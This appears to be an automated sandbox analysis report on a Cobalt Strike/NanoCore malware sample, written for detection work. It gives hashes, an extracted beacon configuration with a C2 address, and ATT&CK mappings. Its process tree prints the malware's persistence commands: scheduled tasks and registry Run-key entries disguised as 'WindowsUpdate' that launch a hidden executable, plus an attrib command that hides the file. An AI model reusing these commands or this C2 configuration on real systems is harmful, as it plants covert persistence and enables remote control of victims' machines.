cobaltstrike | 2b0df16d6ea20b06a52e00a4b7bb85d7b18195b28f8bee28c1672946139803c1

General

Target

cobaltstrike_shellcode.bin.exe
Size

219KB
MD5

8e4d8b8796d2188324a0cfd6fdc8de92
SHA1

9e7a053d34eb00e732e470bc28cc1fa4aa030b8f
SHA256

1ae532cc0fa2e16cac4f23e289741e256cf517afbbb536aeeb0d7cd601bc05a1
SHA512

db4ced8b71b63a7bd48a5bf96270e99c7380865ec31e875b9e0862535298828f4bbae3a4feeb52ef507a8ba461b744c1ce338e3ed191e90cb7079f209ecdbcf3

Score

10^/10

cobaltstrike nanocore backdoor evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

cobaltstrike

C2

http://47.91.237.42:8898/IE9CompatViewList.xml

Attributes

access_type
512
beacon_type
0
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
47.91.237.42,/IE9CompatViewList.xml
http_header1
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
0
maxdns
255
month
0
pipe_name
polling_time
60000
port_number
8898
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDS7zRQv7EhhTkbgDrCNBsNay7lzQFmcC/GWwjOq93nKwPSszjIKgtW8nwhtoRhr6MFZx4DSYFdeuJDrtJNcTZz2C/LgZzhSQJmhiEqCkVqPPCfK1C6S4PzDrzy9L794rPLOuoewlGAXgiH5/Ae2aC5k2wedRNfes3DJZDDCaJJYwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.018915346e+09
uri
/submit.php
user_agent
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)
year
0

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Adds policy Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Adds Run key to start application 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunServices\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunServices\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Setup\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunServices	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Setup	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunServices	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\WindowsUpdate = "C:\\Users\\Public\\svchcst.exe"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup	reg.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4532 schtasks.exe
1068 schtasks.exe
4260 schtasks.exe
828 schtasks.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

1044 reg.exe
4848 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

cobaltstrike_shellcode.bin.exeExplorer.EXE

pid process

4632 cobaltstrike_shellcode.bin.exe
4632 cobaltstrike_shellcode.bin.exe
2956 Explorer.EXE
2956 Explorer.EXE

pid	process
4532	schtasks.exe
1068	schtasks.exe
4260	schtasks.exe
828	schtasks.exe

pid	process
1044	reg.exe
4848	reg.exe

pid	process
4632	cobaltstrike_shellcode.bin.exe
4632	cobaltstrike_shellcode.bin.exe
2956	Explorer.EXE
2956	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 66 IoCs

Processes:

Explorer.EXE

description	pid	process
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE
Token: SeShutdownPrivilege	2956	Explorer.EXE
Token: SeCreatePagefilePrivilege	2956	Explorer.EXE

Suspicious use of WriteProcessMemory 151 IoCs

Processes:

cobaltstrike_shellcode.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4632 wrote to memory of 2956	4632	cobaltstrike_shellcode.bin.exe	Explorer.EXE
PID 4632 wrote to memory of 3908	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 3908	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 3908	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 3908 wrote to memory of 4260	3908	cmd.exe	schtasks.exe
PID 3908 wrote to memory of 4260	3908	cmd.exe	schtasks.exe
PID 3908 wrote to memory of 4260	3908	cmd.exe	schtasks.exe
PID 4632 wrote to memory of 584	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 584	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 584	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 584 wrote to memory of 828	584	cmd.exe	schtasks.exe
PID 584 wrote to memory of 828	584	cmd.exe	schtasks.exe
PID 584 wrote to memory of 828	584	cmd.exe	schtasks.exe
PID 4632 wrote to memory of 928	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 928	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 928	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 928 wrote to memory of 1044	928	cmd.exe	reg.exe
PID 928 wrote to memory of 1044	928	cmd.exe	reg.exe
PID 928 wrote to memory of 1044	928	cmd.exe	reg.exe
PID 4632 wrote to memory of 1144	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 1144	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 1144	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 1144 wrote to memory of 1344	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1344	1144	cmd.exe	reg.exe
PID 1144 wrote to memory of 1344	1144	cmd.exe	reg.exe
PID 4632 wrote to memory of 1416	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 1416	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 1416	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 1416 wrote to memory of 1712	1416	cmd.exe	reg.exe
PID 1416 wrote to memory of 1712	1416	cmd.exe	reg.exe
PID 1416 wrote to memory of 1712	1416	cmd.exe	reg.exe
PID 4632 wrote to memory of 1828	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 1828	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 1828	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 1828 wrote to memory of 3244	1828	cmd.exe	reg.exe
PID 1828 wrote to memory of 3244	1828	cmd.exe	reg.exe
PID 1828 wrote to memory of 3244	1828	cmd.exe	reg.exe
PID 4632 wrote to memory of 4092	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 4092	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 4092	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4092 wrote to memory of 4292	4092	cmd.exe	reg.exe
PID 4092 wrote to memory of 4292	4092	cmd.exe	reg.exe
PID 4092 wrote to memory of 4292	4092	cmd.exe	reg.exe
PID 4632 wrote to memory of 3180	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 3180	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 3180	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 3180 wrote to memory of 4364	3180	cmd.exe	reg.exe
PID 3180 wrote to memory of 4364	3180	cmd.exe	reg.exe
PID 3180 wrote to memory of 4364	3180	cmd.exe	reg.exe
PID 4632 wrote to memory of 4352	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 4352	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 4352	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4352 wrote to memory of 4436	4352	cmd.exe	reg.exe
PID 4352 wrote to memory of 4436	4352	cmd.exe	reg.exe
PID 4352 wrote to memory of 4436	4352	cmd.exe	reg.exe
PID 4632 wrote to memory of 4480	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 4480	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 4480	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4480 wrote to memory of 2304	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 2304	4480	cmd.exe	reg.exe
PID 4480 wrote to memory of 2304	4480	cmd.exe	reg.exe
PID 4632 wrote to memory of 2496	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 2496	4632	cobaltstrike_shellcode.bin.exe	cmd.exe
PID 4632 wrote to memory of 2496	4632	cobaltstrike_shellcode.bin.exe	cmd.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

4512 attrib.exe
1336 attrib.exe

pid	process
4512	attrib.exe
1336	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956

C:\Users\Admin\AppData\Local\Temp\cobaltstrike_shellcode.bin.exe
"C:\Users\Admin\AppData\Local\Temp\cobaltstrike_shellcode.bin.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /create /tn WindowsUpdate /tr C:\Users\Public\svchcst.exe /sc minute /mo 1
3⤵
- Suspicious use of WriteProcessMemory
PID:3908

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn WindowsUpdate /tr C:\Users\Public\svchcst.exe /sc minute /mo 1
4⤵
- Creates scheduled task(s)
PID:4260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN WindewsUpdate /TR C:\Users\Public\svchcst.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN WindewsUpdate /TR C:\Users\Public\svchcst.exe
4⤵
- Creates scheduled task(s)
PID:828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:928

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
- Modifies registry key
PID:1044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load" /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load" /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
PID:1344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
PID:1712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
PID:3244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
PID:4292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:3180

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
PID:4364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:4352

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
PID:4436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
- Suspicious use of WriteProcessMemory
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
PID:2304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
PID:2496

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds Run key to start application
PID:2540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
PID:3208

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds policy Run key to start application
PID:3096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
- Adds policy Run key to start application
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\Userinit /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
3⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\Userinit /v WindowsUpdate /t REG_SZ /d C:\Users\Public\svchcst.exe /f
4⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C attrib C:sersPublicsvchcst.exe +s +h
3⤵
PID:216

C:\Windows\SysWOW64\attrib.exe
attrib C:sersPublicsvchcst.exe +s +h
4⤵
- Views/modifies file attributes
PID:4512

C:\Windows\system32\cmd.exe
